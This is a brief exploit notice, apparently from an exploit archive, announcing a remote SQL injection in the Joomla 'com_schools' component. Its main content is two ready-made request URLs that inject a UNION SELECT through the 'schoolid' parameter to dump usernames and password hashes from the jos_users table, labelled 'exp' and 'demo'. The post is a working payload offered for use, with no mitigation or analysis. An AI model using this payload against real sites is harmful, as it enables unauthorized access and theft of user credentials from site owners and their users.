The Joomla Schools component suffers from a remote SQL injection vulnerability.
38dd2fa2f8f01f2210dc45dc92e9377db120ec6deb2c549236e7605b2fcebd94
Joomla Component com_schools SQL injection
author:Mr.tro0oqy
email:t.4@windowslive.com
exp:
http://server/path/index.php?option=com_schools&Itemid=89&schoolid=-53+union+select+1,group_concat(username,0x3a,password),3,4,5,6,7,8,9,10,11+from+jos_users--
demo :
http://server/index.php?option=com_schools&Itemid=89&schoolid=-53+union+select+1,group_concat(username,0x3a,password),3,4,5,6,7,8,9,10,11+from+jos_users--
qtaaaaaaaaf :)